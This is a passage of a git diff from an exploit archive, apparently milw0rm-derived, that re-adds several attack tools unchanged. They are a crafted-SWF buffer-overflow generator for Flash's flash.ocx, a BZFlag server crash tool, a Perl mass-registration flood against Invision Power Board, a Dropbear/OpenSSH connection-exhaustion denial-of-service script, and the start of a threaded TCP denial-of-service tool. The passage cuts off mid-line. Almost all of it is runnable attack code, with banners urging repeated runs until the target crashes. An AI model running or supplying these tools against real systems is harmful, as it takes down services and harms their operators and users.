."); - fwrite(SWF,1,sizeof(SWF),f); - fwrite("\n",1,1,f); - fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f); - fwrite("\n",1,1,f); - fwrite(DoAction,1,sizeof(DoAction),f); - fwrite("\n",1,1,f); - fwrite(ShowFrame,1,sizeof(ShowFrame),f); - fwrite("\n",1,1,f); - fwrite(End,1,sizeof(End),f); - fwrite("\n",1,1,f); - fwrite(SWF_,1,sizeof(SWF_),f); - printf("\nFile created successfully!"); - printf("\nFilename: %s",argv[1]); - return 0; -} - -void usage(char* file) -{ - printf("\n\n"); - printf("\n%s ",file); - printf("\n\nFilename = .swf crafted file. Eg: overflow.swf"); - exit(1); -} - -// milw0rm.com [2005-11-18] +/* + + * ********************************************************* * + * Macromedia Flash Plugin - Buffer Overflow in flash.ocx * + * ********************************************************* * + * Version: v7.0.19.0 * + * PoC coded by: BassReFLeX * + * Date: 11 Oct 2005 * + * ********************************************************* * + +*/ + +#include +#include +#include + +void usage(char* file); + +/* + +... + +*/ +char SWF[] = ""; +char SWF_[] = ""; + +//[SetBackgroundColor] +char SetBackgroundColor[] = "\x43\x02\xff\x00\x00"; + +//[DoAction] 1 pwn j00r 455! 
+char DoAction[] = "\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00" + "\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43" + "\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45" + "\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00"; + +//[ShowFrame] +char ShowFrame[] = "\x40\x00"; + +//[End] +char End[] = "\x00\x00"; + +int main(int argc,char* argv[]) +{ + system("cls"); + printf("\n* ********************************************************* *"); + printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *"); + printf("\n* ********************************************************* *"); + printf("\n* Version: v7.0.19.0 *"); + printf("\n* Date: 11 Oct 2005 *"); + printf("\n* ProofOfConcept(POC) coded by: BassReFLeX *"); + printf("\n* ********************************************************* *"); + + if ( argc!=2 ) + { + usage(argv[0]); + } + + FILE *f; + f = fopen(argv[1],"w"); + if ( !f ) + { + printf("\nFile couldn't open!"); + exit(1); + } + + printf("\n\nWriting crafted .swf file . . ."); + fwrite(SWF,1,sizeof(SWF),f); + fwrite("\n",1,1,f); + fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f); + fwrite("\n",1,1,f); + fwrite(DoAction,1,sizeof(DoAction),f); + fwrite("\n",1,1,f); + fwrite(ShowFrame,1,sizeof(ShowFrame),f); + fwrite("\n",1,1,f); + fwrite(End,1,sizeof(End),f); + fwrite("\n",1,1,f); + fwrite(SWF_,1,sizeof(SWF_),f); + printf("\nFile created successfully!"); + printf("\nFilename: %s",argv[1]); + return 0; +} + +void usage(char* file) +{ + printf("\n\n"); + printf("\n%s ",file); + printf("\n\nFilename = .swf crafted file. Eg: overflow.swf"); + exit(1); +} + +// milw0rm.com [2005-11-18] diff --git a/platforms/multiple/dos/1390.c b/platforms/multiple/dos/1390.c index 851bd90c1..690e5b9a2 100755 --- a/platforms/multiple/dos/1390.c +++ b/platforms/multiple/dos/1390.c 
@@ -1,366 +1,366 @@ -/* - -by Luigi Auriemma - -*/ - -#include -#include -#include -#include -#include - -#ifdef WIN32 - #include -/* - Header file used for manage errors in Windows - It support socket and errno too - (this header replace the previous sock_errX.h) -*/ - -#include -#include - - - -void std_err(void) { - char *error; - - switch(WSAGetLastError()) { - case 10004: error = "Interrupted system call"; break; - case 10009: error = "Bad file number"; break; - case 10013: error = "Permission denied"; break; - case 10014: error = "Bad address"; break; - case 10022: error = "Invalid argument (not bind)"; break; - case 10024: error = "Too many open files"; break; - case 10035: error = "Operation would block"; break; - case 10036: error = "Operation now in progress"; break; - case 10037: error = "Operation already in progress"; break; - case 10038: error = "Socket operation on non-socket"; break; - case 10039: error = "Destination address required"; break; - case 10040: error = "Message too long"; break; - case 10041: error = "Protocol wrong type for socket"; break; - case 10042: error = "Bad protocol option"; break; - case 10043: error = "Protocol not supported"; break; - case 10044: error = "Socket type not supported"; break; - case 10045: error = "Operation not supported on socket"; break; - case 10046: error = "Protocol family not supported"; break; - case 10047: error = "Address family not supported by protocol family"; break; - case 10048: error = "Address already in use"; break; - case 10049: error = "Can't assign requested address"; break; - case 10050: error = "Network is down"; break; - case 10051: error = "Network is unreachable"; break; - case 10052: error = "Net dropped connection or reset"; break; - case 10053: error = "Software caused connection abort"; break; - case 10054: error = "Connection reset by peer"; break; - case 10055: error = "No buffer space available"; break; - case 10056: error = "Socket is already connected"; break; - case 10057: 
error = "Socket is not connected"; break; - case 10058: error = "Can't send after socket shutdown"; break; - case 10059: error = "Too many references, can't splice"; break; - case 10060: error = "Connection timed out"; break; - case 10061: error = "Connection refused"; break; - case 10062: error = "Too many levels of symbolic links"; break; - case 10063: error = "File name too long"; break; - case 10064: error = "Host is down"; break; - case 10065: error = "No Route to Host"; break; - case 10066: error = "Directory not empty"; break; - case 10067: error = "Too many processes"; break; - case 10068: error = "Too many users"; break; - case 10069: error = "Disc Quota Exceeded"; break; - case 10070: error = "Stale NFS file handle"; break; - case 10091: error = "Network SubSystem is unavailable"; break; - case 10092: error = "WINSOCK DLL Version out of range"; break; - case 10093: error = "Successful WSASTARTUP not yet performed"; break; - case 10071: error = "Too many levels of remote in path"; break; - case 11001: error = "Host not found"; break; - case 11002: error = "Non-Authoritative Host not found"; break; - case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break; - case 11004: error = "Valid name, no data record of requested type"; break; - default: error = strerror(errno); break; - } - fprintf(stderr, "\nError: %s\n", error); - exit(1); -} - -// combined winerr.h /str0ke - - #define close closesocket -#else - #include - #include - #include - #include - #include - #include -#endif - - - -#define VER "0.1" -#define BUFFSZ 0xffff -#define PORT 5154 -#define TIMEOUT 8 - -#define WAITSEC 5 -#define CALLSIGNSZ 32 -#define MAILSZ 128 -#define TOKENSZ 22 -#define VERSIONSZ 60 -#define TYPE "\x00\x00" -#define TEAM "\xff\xfe" // autoteam - - - -int bzflag_send(int sd, u_char *buff, u_char *code, ...); -int tcp_recv(int sd, u_char *data, int len); -u_short bzflag_recv(int sd, u_char *buff, u_char *code); -int create_rand_string(u_char *data, int len, 
u_int *seed); -int timeout(int sock, int secs); -u_int resolv(char *host); -void std_err(void); - - - -int main(int argc, char *argv[]) { - struct sockaddr_in peer; - u_int seed; - int sd; - u_short port = PORT, - len; - u_char buff[BUFFSZ], - callsign[CALLSIGNSZ + 1], - mail[MAILSZ + 1], - token[TOKENSZ + 1], - version[VERSIONSZ + 1], - code[2]; - -#ifdef WIN32 - WSADATA wsadata; - WSAStartup(MAKEWORD(1,0), &wsadata); -#endif - - - setbuf(stdout, NULL); - - fputs("\n" - "BZFlag <= 2.0.4 (2.x) server crash "VER"\n" - "by Luigi Auriemma\n" - "e-mail: aluigi@autistici.org\n" - "web: http://aluigi.altervista.org\n" - "\n", stdout); - - if(argc < 2) { - printf("\n" - "Usage: %s [port(%hu)]\n" - "\n" - " This tool works also versus servers protected by password without knowing the\n" - " keyword!\n" - "\n", argv[0], port); - exit(1); - } - - if(argc > 2) port = atoi(argv[2]); - - peer.sin_addr.s_addr = resolv(argv[1]); - peer.sin_port = htons(port); - peer.sin_family = AF_INET; - - printf("- target %s : %hu\n", - inet_ntoa(peer.sin_addr), port); - - fputs("- check server version: ", stdout); - sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - if(sd < 0) std_err(); - if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) - < 0) std_err(); - if(timeout(sd, TIMEOUT) < 0) { - printf("\nError: no reply received within %d seconds, this server doesn't seem valid\n\n", TIMEOUT); - exit(1); - } - tcp_recv(sd, buff, 9); - - printf(" %s\n", buff); - if(memcmp(buff, "BZFS", 4)) { - fputs("- this server doesn't seem a valid BZFlag server, I try to continue\n", stdout); - } else { - if(memcmp(buff + 4, "00", 2)) { - fputs("- this server uses a version which is not vulnerable, I try to continue\n", stdout); - } - } - - if(!timeout(sd, 0)) { // 2.0.4 sends data while the previous 2.0 not - len = bzflag_recv(sd, buff, code); - } - - create_rand_string(callsign, CALLSIGNSZ, &seed); // <=== THE BUG IS HERE - create_rand_string(mail, MAILSZ, &seed); - create_rand_string(token, TOKENSZ, 
&seed); - create_rand_string(version, VERSIONSZ, &seed); - - bzflag_send(sd, - buff, - "en", - 2, TYPE, - 2, TEAM, - CALLSIGNSZ, callsign, - MAILSZ, mail, - TOKENSZ, token, - VERSIONSZ, version, - 0); - - len = bzflag_recv(sd, buff, code); - - if(memcmp(code, "ac", 2)) { - buff[len] = 0; - printf("\n" - "Error: code \"%.2s\"\n" - "%s\n" - "\n", - code, buff + 2); - } - - close(sd); - - fputs("- check server:\n", stdout); - sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); - if(sd < 0) std_err(); - if( - (connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) || - (timeout(sd, 3) < 0)) { - fputs("\n Server IS vulnerable!!!\n\n", stdout); - } else { - fputs("\n" - " Server doesn't seem vulnerable\n" - " RELAUNCH THIS TOOL OTHER TIMES UNTIL YOU ARE UNABLE TO CRASH IT!!!\n" - "\n", stdout); - } - close(sd); - return(0); -} - - - -int bzflag_send(int sd, u_char *buff, u_char *code, ...) { - va_list ap; - int len; - u_short *blen; - u_char *s, - *p; - - blen = (u_short *)buff; - memcpy(buff + 2, code, 2); - p = buff + 4; - - va_start(ap, code); - while((len = va_arg(ap, int))) { - s = va_arg(ap, u_char *); - memcpy(p, s, len); - p += len; - } - va_end(ap); - - *blen = htons(p - (buff + 4)); - - len = send(sd, buff, p - buff, 0); - return(len); -} - - - -int tcp_recv(int sd, u_char *data, int len) { - int t; - - while(len) { - t = recv(sd, data, len, 0); - if(t <= 0) return(-1); - data += t; - len -= t; - } - - return(0); -} - - - -u_short bzflag_recv(int sd, u_char *buff, u_char *code) { - u_short len; - - tcp_recv(sd, (u_char *)&len, 2); - len = ntohs(len); - - tcp_recv(sd, code, 2); - - tcp_recv(sd, buff, len); - - return(len); -} - - - -int create_rand_string(u_char *data, int len, u_int *seed) { - u_int rnd; - u_char *p = data; - const static u_char table[] = - "0123456789" - "ABCDEFGHIJKLMNOPQRSTUVWXYZ" - "abcdefghijklmnopqrstuvwxyz"; - - rnd = *seed; -// len = rnd % len; // max length! 
-// if(len < 3) len = 3; - - while(len--) { - rnd = (rnd * 0x343FD) + 0x269EC3; - *p++ = table[rnd % (sizeof(table) - 1)]; - } - *p = 0; - - *seed = rnd; - return(p - data); -} - - - -int timeout(int sock, int secs) { - struct timeval tout; - fd_set fd_read; - int err; - - tout.tv_sec = secs; - tout.tv_usec = 1000; // in case secs is 0 - FD_ZERO(&fd_read); - FD_SET(sock, &fd_read); - err = select(sock + 1, &fd_read, NULL, NULL, &tout); - if(err < 0) std_err(); - if(!err) return(-1); - return(0); -} - - - -u_int resolv(char *host) { - struct hostent *hp; - u_int host_ip; - - host_ip = inet_addr(host); - if(host_ip == INADDR_NONE) { - hp = gethostbyname(host); - if(!hp) { - printf("\nError: Unable to resolv hostname (%s)\n", host); - exit(1); - } else host_ip = *(u_int *)hp->h_addr; - } - return(host_ip); -} - - - -#ifndef WIN32 - void std_err(void) { - perror("\nError"); - exit(1); - } -#endif - -// milw0rm.com [2005-12-27] +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include +#include +#include + +#ifdef WIN32 + #include +/* + Header file used for manage errors in Windows + It support socket and errno too + (this header replace the previous sock_errX.h) +*/ + +#include +#include + + + +void std_err(void) { + char *error; + + switch(WSAGetLastError()) { + case 10004: error = "Interrupted system call"; break; + case 10009: error = "Bad file number"; break; + case 10013: error = "Permission denied"; break; + case 10014: error = "Bad address"; break; + case 10022: error = "Invalid argument (not bind)"; break; + case 10024: error = "Too many open files"; break; + case 10035: error = "Operation would block"; break; + case 10036: error = "Operation now in progress"; break; + case 10037: error = "Operation already in progress"; break; + case 10038: error = "Socket operation on non-socket"; break; + case 10039: error = "Destination address required"; break; + case 10040: error = "Message too long"; break; + case 10041: error = "Protocol wrong type for socket"; 
break; + case 10042: error = "Bad protocol option"; break; + case 10043: error = "Protocol not supported"; break; + case 10044: error = "Socket type not supported"; break; + case 10045: error = "Operation not supported on socket"; break; + case 10046: error = "Protocol family not supported"; break; + case 10047: error = "Address family not supported by protocol family"; break; + case 10048: error = "Address already in use"; break; + case 10049: error = "Can't assign requested address"; break; + case 10050: error = "Network is down"; break; + case 10051: error = "Network is unreachable"; break; + case 10052: error = "Net dropped connection or reset"; break; + case 10053: error = "Software caused connection abort"; break; + case 10054: error = "Connection reset by peer"; break; + case 10055: error = "No buffer space available"; break; + case 10056: error = "Socket is already connected"; break; + case 10057: error = "Socket is not connected"; break; + case 10058: error = "Can't send after socket shutdown"; break; + case 10059: error = "Too many references, can't splice"; break; + case 10060: error = "Connection timed out"; break; + case 10061: error = "Connection refused"; break; + case 10062: error = "Too many levels of symbolic links"; break; + case 10063: error = "File name too long"; break; + case 10064: error = "Host is down"; break; + case 10065: error = "No Route to Host"; break; + case 10066: error = "Directory not empty"; break; + case 10067: error = "Too many processes"; break; + case 10068: error = "Too many users"; break; + case 10069: error = "Disc Quota Exceeded"; break; + case 10070: error = "Stale NFS file handle"; break; + case 10091: error = "Network SubSystem is unavailable"; break; + case 10092: error = "WINSOCK DLL Version out of range"; break; + case 10093: error = "Successful WSASTARTUP not yet performed"; break; + case 10071: error = "Too many levels of remote in path"; break; + case 11001: error = "Host not found"; break; + case 11002: error = 
"Non-Authoritative Host not found"; break; + case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break; + case 11004: error = "Valid name, no data record of requested type"; break; + default: error = strerror(errno); break; + } + fprintf(stderr, "\nError: %s\n", error); + exit(1); +} + +// combined winerr.h /str0ke + + #define close closesocket +#else + #include + #include + #include + #include + #include + #include +#endif + + + +#define VER "0.1" +#define BUFFSZ 0xffff +#define PORT 5154 +#define TIMEOUT 8 + +#define WAITSEC 5 +#define CALLSIGNSZ 32 +#define MAILSZ 128 +#define TOKENSZ 22 +#define VERSIONSZ 60 +#define TYPE "\x00\x00" +#define TEAM "\xff\xfe" // autoteam + + + +int bzflag_send(int sd, u_char *buff, u_char *code, ...); +int tcp_recv(int sd, u_char *data, int len); +u_short bzflag_recv(int sd, u_char *buff, u_char *code); +int create_rand_string(u_char *data, int len, u_int *seed); +int timeout(int sock, int secs); +u_int resolv(char *host); +void std_err(void); + + + +int main(int argc, char *argv[]) { + struct sockaddr_in peer; + u_int seed; + int sd; + u_short port = PORT, + len; + u_char buff[BUFFSZ], + callsign[CALLSIGNSZ + 1], + mail[MAILSZ + 1], + token[TOKENSZ + 1], + version[VERSIONSZ + 1], + code[2]; + +#ifdef WIN32 + WSADATA wsadata; + WSAStartup(MAKEWORD(1,0), &wsadata); +#endif + + + setbuf(stdout, NULL); + + fputs("\n" + "BZFlag <= 2.0.4 (2.x) server crash "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: http://aluigi.altervista.org\n" + "\n", stdout); + + if(argc < 2) { + printf("\n" + "Usage: %s [port(%hu)]\n" + "\n" + " This tool works also versus servers protected by password without knowing the\n" + " keyword!\n" + "\n", argv[0], port); + exit(1); + } + + if(argc > 2) port = atoi(argv[2]); + + peer.sin_addr.s_addr = resolv(argv[1]); + peer.sin_port = htons(port); + peer.sin_family = AF_INET; + + printf("- target %s : %hu\n", + inet_ntoa(peer.sin_addr), port); + + fputs("- check 
server version: ", stdout); + sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if(sd < 0) std_err(); + if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) + < 0) std_err(); + if(timeout(sd, TIMEOUT) < 0) { + printf("\nError: no reply received within %d seconds, this server doesn't seem valid\n\n", TIMEOUT); + exit(1); + } + tcp_recv(sd, buff, 9); + + printf(" %s\n", buff); + if(memcmp(buff, "BZFS", 4)) { + fputs("- this server doesn't seem a valid BZFlag server, I try to continue\n", stdout); + } else { + if(memcmp(buff + 4, "00", 2)) { + fputs("- this server uses a version which is not vulnerable, I try to continue\n", stdout); + } + } + + if(!timeout(sd, 0)) { // 2.0.4 sends data while the previous 2.0 not + len = bzflag_recv(sd, buff, code); + } + + create_rand_string(callsign, CALLSIGNSZ, &seed); // <=== THE BUG IS HERE + create_rand_string(mail, MAILSZ, &seed); + create_rand_string(token, TOKENSZ, &seed); + create_rand_string(version, VERSIONSZ, &seed); + + bzflag_send(sd, + buff, + "en", + 2, TYPE, + 2, TEAM, + CALLSIGNSZ, callsign, + MAILSZ, mail, + TOKENSZ, token, + VERSIONSZ, version, + 0); + + len = bzflag_recv(sd, buff, code); + + if(memcmp(code, "ac", 2)) { + buff[len] = 0; + printf("\n" + "Error: code \"%.2s\"\n" + "%s\n" + "\n", + code, buff + 2); + } + + close(sd); + + fputs("- check server:\n", stdout); + sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if(sd < 0) std_err(); + if( + (connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) || + (timeout(sd, 3) < 0)) { + fputs("\n Server IS vulnerable!!!\n\n", stdout); + } else { + fputs("\n" + " Server doesn't seem vulnerable\n" + " RELAUNCH THIS TOOL OTHER TIMES UNTIL YOU ARE UNABLE TO CRASH IT!!!\n" + "\n", stdout); + } + close(sd); + return(0); +} + + + +int bzflag_send(int sd, u_char *buff, u_char *code, ...) 
{ + va_list ap; + int len; + u_short *blen; + u_char *s, + *p; + + blen = (u_short *)buff; + memcpy(buff + 2, code, 2); + p = buff + 4; + + va_start(ap, code); + while((len = va_arg(ap, int))) { + s = va_arg(ap, u_char *); + memcpy(p, s, len); + p += len; + } + va_end(ap); + + *blen = htons(p - (buff + 4)); + + len = send(sd, buff, p - buff, 0); + return(len); +} + + + +int tcp_recv(int sd, u_char *data, int len) { + int t; + + while(len) { + t = recv(sd, data, len, 0); + if(t <= 0) return(-1); + data += t; + len -= t; + } + + return(0); +} + + + +u_short bzflag_recv(int sd, u_char *buff, u_char *code) { + u_short len; + + tcp_recv(sd, (u_char *)&len, 2); + len = ntohs(len); + + tcp_recv(sd, code, 2); + + tcp_recv(sd, buff, len); + + return(len); +} + + + +int create_rand_string(u_char *data, int len, u_int *seed) { + u_int rnd; + u_char *p = data; + const static u_char table[] = + "0123456789" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz"; + + rnd = *seed; +// len = rnd % len; // max length! +// if(len < 3) len = 3; + + while(len--) { + rnd = (rnd * 0x343FD) + 0x269EC3; + *p++ = table[rnd % (sizeof(table) - 1)]; + } + *p = 0; + + *seed = rnd; + return(p - data); +} + + + +int timeout(int sock, int secs) { + struct timeval tout; + fd_set fd_read; + int err; + + tout.tv_sec = secs; + tout.tv_usec = 1000; // in case secs is 0 + FD_ZERO(&fd_read); + FD_SET(sock, &fd_read); + err = select(sock + 1, &fd_read, NULL, NULL, &tout); + if(err < 0) std_err(); + if(!err) return(-1); + return(0); +} + + + +u_int resolv(char *host) { + struct hostent *hp; + u_int host_ip; + + host_ip = inet_addr(host); + if(host_ip == INADDR_NONE) { + hp = gethostbyname(host); + if(!hp) { + printf("\nError: Unable to resolv hostname (%s)\n", host); + exit(1); + } else host_ip = *(u_int *)hp->h_addr; + } + return(host_ip); +} + + + +#ifndef WIN32 + void std_err(void) { + perror("\nError"); + exit(1); + } +#endif + +// milw0rm.com [2005-12-27] 
diff --git a/platforms/multiple/dos/1489.pl b/platforms/multiple/dos/1489.pl
index da00d661b..79a07c0c2 100755
--- a/platforms/multiple/dos/1489.pl
+++ b/platforms/multiple/dos/1489.pl
@@ -1,46 +1,46 @@ -#!/usr/bin/perl -use IO::Socket; -########################################################## -## _______ _______ ______ # -## |______ |______ | \ # -## ______| |______ |_____/ # -## # -##IPB Register Multiple Users Denial of Service # -##Doesn't Work on forums using "Code Confirmation" # -##Created By SkOd # -##SED security Team # -##http://www.sed-team.be # -##skod.uk@gmail.com # -##ISRAEL # -########################################################## - -print q{ -############################################################ -# Invision Power Board Multiple Users DOS # -# Tested on IPB 2.0.1 # -# created By SkOd. SED Security Team # -############################################################ -}; -$rand=rand(10); -print "Forum Host: "; -$serv = ; -chop ($serv); -print "Forum Path: "; -$path = ; -chop ($path); -for ($i=0; $i<9999; $i++) -{ -$name="sedXPL_".$rand.$i; -$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1"; -$len = length $data; -$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; -print $get1 "POST ".$path."index.php HTTP/1.0\n"; -print $get1 "Host: ".$serv."\n"; -print $get1 "Content-Type: application/x-www-form-urlencoded\n"; -print $get1 "Content-Length: ".$len."\n\n"; -print $get1 $data; -syswrite STDOUT, "+"; -} -print "Forum shuld be Dosed. 
Check it out...\n"; - -# milw0rm.com [2006-02-10] +#!/usr/bin/perl +use IO::Socket; +########################################################## +## _______ _______ ______ # +## |______ |______ | \ # +## ______| |______ |_____/ # +## # +##IPB Register Multiple Users Denial of Service # +##Doesn't Work on forums using "Code Confirmation" # +##Created By SkOd # +##SED security Team # +##http://www.sed-team.be # +##skod.uk@gmail.com # +##ISRAEL # +########################################################## + +print q{ +############################################################ +# Invision Power Board Multiple Users DOS # +# Tested on IPB 2.0.1 # +# created By SkOd. SED Security Team # +############################################################ +}; +$rand=rand(10); +print "Forum Host: "; +$serv = ; +chop ($serv); +print "Forum Path: "; +$path = ; +chop ($path); +for ($i=0; $i<9999; $i++) +{ +$name="sedXPL_".$rand.$i; +$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1"; +$len = length $data; +$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; +print $get1 "POST ".$path."index.php HTTP/1.0\n"; +print $get1 "Host: ".$serv."\n"; +print $get1 "Content-Type: application/x-www-form-urlencoded\n"; +print $get1 "Content-Length: ".$len."\n\n"; +print $get1 $data; +syswrite STDOUT, "+"; +} +print "Forum shuld be Dosed. Check it out...\n"; + +# milw0rm.com [2006-02-10] diff --git a/platforms/multiple/dos/1572.pl b/platforms/multiple/dos/1572.pl index 8dacf1818..790ead8bb 100755 --- a/platforms/multiple/dos/1572.pl +++ b/platforms/multiple/dos/1572.pl 
@@ -1,64 +1,64 @@ -#!/usr/bin/perl -## I needed a working test script so here it is. -## just a keep alive thread, I had a few problems with Pablo's code running properly. -## -## Straight from Pablo Fernandez's advisory: -# Vulnerable code is in svr-main.c -# -# /* check for max number of connections not authorised */ -# for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) { -# if (childpipes[j] < 0) { -# break; -# } -# } -# -# if (j == MAX_UNAUTH_CLIENTS) { -# /* no free connections */ -# /* TODO - possibly log, though this would be an easy way -# * to fill logs/disk */ -# close(childsock); -# continue; -# } -## /str0ke (milw0rm.com) - -use IO::Socket; -use Thread; -use strict; - -# thanks to Perl Underground for my moronic coding style fixes. -my ($serv, $port, $time) = @ARGV; - -sub usage -{ - print "\nDropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service Exploit\n"; - print "by /str0ke (milw0rm.com)\n"; - print "Credits to Pablo Fernandez\n"; - print "Usage: $0 [Target Domain] [Target Port] [Seconds to hold attack]\n"; - exit (); -} - -sub exploit -{ - my ($serv, $port, $sleep) = @_; - my $sock = new IO::Socket::INET ( PeerAddr => $serv, - PeerPort => $port, - Proto => 'tcp', - ); - - die "Could not create socket: $!\n" unless $sock; - sleep $sleep; - close($sock); -} - -sub thread { - print "Server: $serv\nPort: $port\nSeconds: $time\n"; - for my $i ( 1 .. 51 ) { - print "."; - my $thr = new Thread \&exploit, $serv, $port, $time; - } - sleep $time; #detach wouldn't be good -} - -if (@ARGV != 3){&usage;}else{&thread;} - -# milw0rm.com [2006-03-10] +#!/usr/bin/perl +## I needed a working test script so here it is. +## just a keep alive thread, I had a few problems with Pablo's code running properly. 
+## +## Straight from Pablo Fernandez's advisory: +# Vulnerable code is in svr-main.c +# +# /* check for max number of connections not authorised */ +# for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) { +# if (childpipes[j] < 0) { +# break; +# } +# } +# +# if (j == MAX_UNAUTH_CLIENTS) { +# /* no free connections */ +# /* TODO - possibly log, though this would be an easy way +# * to fill logs/disk */ +# close(childsock); +# continue; +# } +## /str0ke (milw0rm.com) + +use IO::Socket; +use Thread; +use strict; + +# thanks to Perl Underground for my moronic coding style fixes. +my ($serv, $port, $time) = @ARGV; + +sub usage +{ + print "\nDropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service Exploit\n"; + print "by /str0ke (milw0rm.com)\n"; + print "Credits to Pablo Fernandez\n"; + print "Usage: $0 [Target Domain] [Target Port] [Seconds to hold attack]\n"; + exit (); +} + +sub exploit +{ + my ($serv, $port, $sleep) = @_; + my $sock = new IO::Socket::INET ( PeerAddr => $serv, + PeerPort => $port, + Proto => 'tcp', + ); + + die "Could not create socket: $!\n" unless $sock; + sleep $sleep; + close($sock); +} + +sub thread { + print "Server: $serv\nPort: $port\nSeconds: $time\n"; + for my $i ( 1 .. 51 ) { + print "."; + my $thr = new Thread \&exploit, $serv, $port, $time; + } + sleep $time; #detach wouldn't be good +} + +if (@ARGV != 3){&usage;}else{&thread;} + +# milw0rm.com [2006-03-10] diff --git a/platforms/multiple/dos/1671.c b/platforms/multiple/dos/1671.c index fb01d465e..cfb3747a9 100755 --- a/platforms/multiple/dos/1671.c +++ b/platforms/multiple/dos/1671.c 
@@ -1,260 +1,260 @@ -/* ----------------------------------------------------------------------------- - * ______________________________ __________ - * __ ____/_ __ \__ __/__ __/_____ ____ ____ /_ /_ - * _ / __ _ / / /_ / __ /_ _ __ / / / /_ /_ __/ - * / /_/ / / /_/ /_ / _ __/ / /_/ // /_/ /_ / / /_ - * \____/ \____/ /_/ /_/ \__,_/ \__,_/ /_/ \__/ - * Security Community - * - * ----------------------------------------------------------------------------- - * - * Software for educational purposes - * - * panic-reloaded.c written by hash - * - * - * Description: TCP Denial Of Service Tool. panic-reloaded does - * not require large link or fast internet connection, - * it creates many pthreads, leaving openned connections - * to victim host. It is fast and an efficient way to - * deny a TCP service. - * - * Tested against SSH, FTP, HTTP. - * - * TTY1: - * hash@scarface:~$ gcc -lpthread panic-reloaded.c -o panic-reloaded -Wall - * hash@scarface:~$ ./panic-reloaded3 10.10.10.2 22 20 100 10 - * panic-reloaded.c - * written by hash - * [!] Target: localhost:443 - * [!] Threads: 20 for each round - * [*] Countdown: 40 | [!] Sleeping: 10s - * - * TTY2: - * hash@scarface:~$ ssh localhost - * ssh_exchange_identification: Connection closed by remote host - * hash@scarface:~$ - * - * - * Greets to folks from gotfault, rfdslabs, tripbit - * and to friends out there. 
-*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define AUTHOR "written by hash " - -void usage(char*); -void sockz(void*); -void header(); -void close_func(void *); -char *resolver(char*); - -struct pthread_args { - - char *host_pthread; - char *port_pthread; - char *slp_pthread; - -};struct pthread_args thread_data_array[1]; - -struct pthread_close { - - char *slp_pthread; - int sock_pointer; - -};struct pthread_close thread_data[0]; - -void usage(char *progname) { - - header(); - printf("Use: %s host port threads rounds sleep_time\n",progname); - printf("host: ip address or hostname\n"); - printf("port: victim port\n"); - printf("threads: number of threads\n"); - printf("rounds: number of reloads, min 40\n"); - printf("sleep_time: sleep time between each round\n"); - exit(0); - -} - -void header() { - - printf("panic-reloaded.c\n"); - printf("%s\n",AUTHOR); - -} - -void close_func(void *c) { - - struct pthread_close *my_close; - - char *slp_tmp; - int slp, - err, - sock_p; - - my_close = (struct pthread_close *) c; - slp_tmp = my_close->slp_pthread; - sock_p = my_close->sock_pointer; - - slp = atoi(slp_tmp); - - sleep(slp+1); - - if((err = close(sock_p)) < 0) { - printf("close_func: Can`t close socket\n"); - exit(-1); - } - - -} - -void sockz(void *t) { - - struct sockaddr_in dest; - struct pthread_args *my_data; - pthread_t close_them_all; - - char *h, - *p_tmp, - *slp_tmp; - - int p, - con, - err, - desc, - slp; - - my_data = (struct pthread_args *) t; - - h = my_data->host_pthread; - p_tmp = my_data->port_pthread; - slp_tmp = my_data->slp_pthread; - - p = atoi(p_tmp); - slp = atoi(slp_tmp); - - desc = socket(AF_INET,SOCK_STREAM,0); - - if((desc = socket(AF_INET,SOCK_STREAM,0)) < 0) { - perror("sockz: Can`t create socket\n"); - exit(-1); - } - - dest.sin_family = AF_INET; - dest.sin_port = htons(p); - dest.sin_addr.s_addr = inet_addr(h); - bzero(&(dest.sin_zero),8); - - con = connect(desc,(struct sockaddr 
